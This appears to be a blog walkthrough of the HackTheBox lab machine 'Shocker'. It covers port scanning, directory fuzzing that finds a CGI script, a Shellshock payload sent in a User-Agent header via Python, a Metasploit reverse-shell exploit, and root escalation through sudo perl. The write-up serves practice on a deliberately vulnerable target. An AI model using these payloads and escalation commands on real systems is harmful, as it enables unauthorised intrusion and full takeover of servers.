Hi everyone!

Today’s post is on Shocker, an easy GNU/Linux machine on HackTheBox. It was created on 1st October 2017. It is a very easy machine which can probably take you less than 10 mins to pwn it. The only time-consuming part is choosing the right tool for enumeration. This machine is on exploiting shell shock vulnerability to gain access to the server and exploit Perl GTFO for privilege escalation (PE). Read on if you are interested. Let’s get started!

Tools required

• Nmap
• Dirbuster
• Metasploit (Optional)

Nmap analysis

First things first, we have to start with ports scan to see what are the service available on the machine.

┌──(soulx㉿kali)-[~]
└─$ IP=10.10.10.56                        
                                                                                                                                                                                                                                             
┌──(soulx㉿kali)-[~]
└─$ nmap -A -p1-9999 -v 10.10.10.56          
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 10:54 +08
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating NSE at 10:54
Completed NSE at 10:54, 0.00s elapsed
Initiating Ping Scan at 10:54
Scanning 10.10.10.56 [2 ports]
Completed Ping Scan at 10:54, 0.24s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:54
Completed Parallel DNS resolution of 1 host. at 10:54, 0.20s elapsed
Initiating Connect Scan at 10:54
Scanning 10.10.10.56 [9999 ports]
Discovered open port 80/tcp on 10.10.10.56
Increasing send delay for 10.10.10.56 from 0 to 5 due to max_successful_tryno increase to 4
Discovered open port 2222/tcp on 10.10.10.56
Connect Scan Timing: About 16.46% done; ETC: 10:57 (0:02:37 remaining)
Connect Scan Timing: About 33.34% done; ETC: 10:57 (0:02:02 remaining)
Increasing send delay for 10.10.10.56 from 5 to 10 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.10.56 from 10 to 20 due to max_successful_tryno increase to 6
Connect Scan Timing: About 47.29% done; ETC: 10:57 (0:01:41 remaining)
Connect Scan Timing: About 61.57% done; ETC: 10:57 (0:01:16 remaining)
Connect Scan Timing: About 76.00% done; ETC: 10:57 (0:00:48 remaining)
Completed Connect Scan at 10:57, 202.64s elapsed (9999 total ports)
Initiating Service scan at 10:57
Scanning 2 services on 10.10.10.56
Completed Service scan at 10:57, 6.42s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.56.
Initiating NSE at 10:57
Completed NSE at 10:57, 5.22s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.82s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Nmap scan report for 10.10.10.56
Host is up (0.15s latency).
Not shown: 9997 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Initiating NSE at 10:57
Completed NSE at 10:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 216.67 seconds

We can see that there are 2 ports that are open. Port 80 has Apache running as well as SSH at port 2222.

Let’s go to the website to take a look.

Outlook of the website

The website is really simple with just an image. I tried to look at the source code and the response header, there was nothing interesting. I even download the image on the website and run with Strings to see if there is anything useful. Unfortunately, it is futile.

Fuzz web directory

Initially when I tried to use Gobuster, I couldn’t find anything useful despite using a large word list with .php, .pl, .html, .jsp, .txt, and .sh extension. However, once I used Dirbuster, I was able to find something interesting.

┌──(soulx㉿kali)-[~]
└─$ dirbuster http://$IP -l /usr/share/wordlists/dirbuster/directory-list-1.0.txt -e pl,php,html,jsp,sh,txt

This will immediately spawn a GUI window. Fill up the URL while the rest of the content should have already been fill-up due to our flags in the command line.

Once we click start and let it run for a while, we should be able to see an interesting result:

...
File found: //cgi-bin/user.sh - 200
...

If we can access a bash file in the /cgi-bin folder, it is most likely a shellshock vulnerability challenge given that the machine’s name is Shocker.

What is Shellshock?

Shellshock is a vulnerability found in Unix Bash shells in the year 2014. Before it was discovered, it existed for 20+ years. You can watch a short video on Shellshock by Tom Scott here. Basically, the vulnerable version of Bash will execute certain strings as a command. Let’s say the environment variable below:

┌──(soulx㉿kali)-[~]
└─$ x='This is a string'
┌──(soulx㉿kali)-[~]
└─$ echo $x
This is a string

When we assign the string to the environmental variable ‘x’, it will treat the content as a string. However, if we add a function syntax at the start of the string, the content behind will be treated as Bash commands.

┌──(soulx㉿kali)-[~]
└─$ x='() { :; }; whoami'
soulx
┌──(soulx㉿kali)-[~]
└─$ 

Notice that the command whoami is executed? If the vulnerable version of Bash receives () { :; };, it will treat the whole string like a shell script.

If we look at the article by CloudFlare here, we will learn that we can exploit the vulnerability in Apache web servers that uses Common Gateway Interface (CGI) via web request headers (e.g User-Agent, Referer, etc). For example, if we exploit via User-Agent,

import requests

headers = {'User-Agent': "() { :; }; whoami"}
url = "http://10.10.10.56"

response = requests.get(url, headers=headers)

This will generate an environmental variable:

HTTP_USER_AGENT=() { :; }; whoami

As such, Bash will execute the whoami command.

Access the web server with Metasploit thru shellshock and obtain user flag

For this write-up, I will be using Metasploit. You can also build your own exploit to run a Bash reverse shell and use Netcat to listen to a port or reference to this exploit in exploitDB and make necessary changes here. However, I wouldn’t be doing so since Metasploit already has the exploit and payload for it. This will help me to quickly clear this machine without the need to spend time debugging if anything goes wrong.

Exploit with Metasploit shockshell exploit

Firstly, launch Metasploit with msfconsole command.

We will then search for the shellshock exploit for Apache that uses cgi-bin since we found that /cgi-bin/user.sh is accessible when we did web directory fuzzing. Note that Metasploit uses User-Agent for shellshock exploit by default. Remember to set your LHOST (your IP address), RHOSTS (the machine’s IP address), and TARGETURI (the .sh file we found in the /cgi-bin folder)

msf6 > search shellshock

Matching Modules
================

   #   Name                                               Disclosure Date  Rank       Check  Description
   -   ----                                               ---------------  ----       -----  -----------
   0   exploit/linux/http/advantech_switch_bash_env_exec  2015-12-01       excellent  Yes    Advantech Switch Bash Environment Variable Code Injection (Shellshock)
   1   exploit/multi/http/apache_mod_cgi_bash_env_exec    2014-09-24       excellent  Yes    Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
   2   auxiliary/scanner/http/apache_mod_cgi_bash_env     2014-09-24       normal     Yes    Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
   3   exploit/multi/http/cups_bash_env_exec              2014-09-24       excellent  Yes    CUPS Filter Bash Environment Variable Code Injection (Shellshock)
   4   auxiliary/server/dhclient_bash_env                 2014-09-24       normal     No     DHCP Client Bash Environment Variable Code Injection (Shellshock)
   5   exploit/unix/dhcp/bash_environment                 2014-09-24       excellent  No     Dhclient Bash Environment Variable Injection (Shellshock)
   6   exploit/linux/http/ipfire_bashbug_exec             2014-09-29       excellent  Yes    IPFire Bash Environment Variable Injection (Shellshock)
   7   exploit/multi/misc/legend_bot_exec                 2015-04-27       excellent  Yes    Legend Perl IRC Bot Remote Code Execution
   8   exploit/osx/local/vmware_bash_function_root        2014-09-24       normal     Yes    OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
   9   exploit/multi/ftp/pureftpd_bash_env_exec           2014-09-24       excellent  Yes    Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
   10  exploit/unix/smtp/qmail_bash_env_exec              2014-09-24       normal     No     Qmail SMTP Bash Environment Variable Injection (Shellshock)
   11  exploit/multi/misc/xdh_x_exec                      2015-12-04       excellent  Yes    Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution


Interact with a module by name or index. For example info 11, use 11 or use exploit/multi/misc/xdh_x_exec

msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER          User-Agent       yes       HTTP header to use
   METHOD          GET              yes       HTTP method to use
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPATH           /bin             yes       Target PATH for binaries used by the CmdStager
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI                        yes       Path to CGI script
   TIMEOUT         5                yes       HTTP read response timeout (seconds)
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.10     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux x86

msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set RHOSTS 10.10.10.56
RHOSTS => 10.10.10.56
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set LHOST 10.10.1.1
LHOST => 10.10.1.1
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/user.sh
TARGETURI => /cgi-bin/user.sh
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > check
[+] 10.10.10.56:80 - The target is vulnerable.
msf6 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.24:4444 
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (984904 bytes) to 10.10.10.56
[*] Meterpreter session 1 opened (10.10.14.24:4444 -> 10.10.10.56:32948) at 2021-07-15 12:07:19 +0800
meterpreter >

We can see that we successfully access the server.

Obtaining user flag

meterpreter > shell
Process 12175 created.
Channel 1 created.
whoami
shelly
pwd
/usr/lib/cgi-bin
cd $HOME
ls
user.txt
cat user.txt
95a*****************************

Obtaining root flag

Obtaining the root flag is quite easy as it only takes less than 10 seconds. As usual, we start with using sudo -l command to find any root privileges command the user account has access to.

sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

We can see that Perl is running as root privilege. We can easily find what to do with it on GTFObin here. However, it should be familiar to you that Perl can be used as command-line oneliner scripting. Using Perl, we can launch a shell. This shell will immediately be a root shell since Perl is running as sudo.

sudo perl -e 'exec "/bin/sh";'
whoami
root
cat /root/root.txt
5cc***************************

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂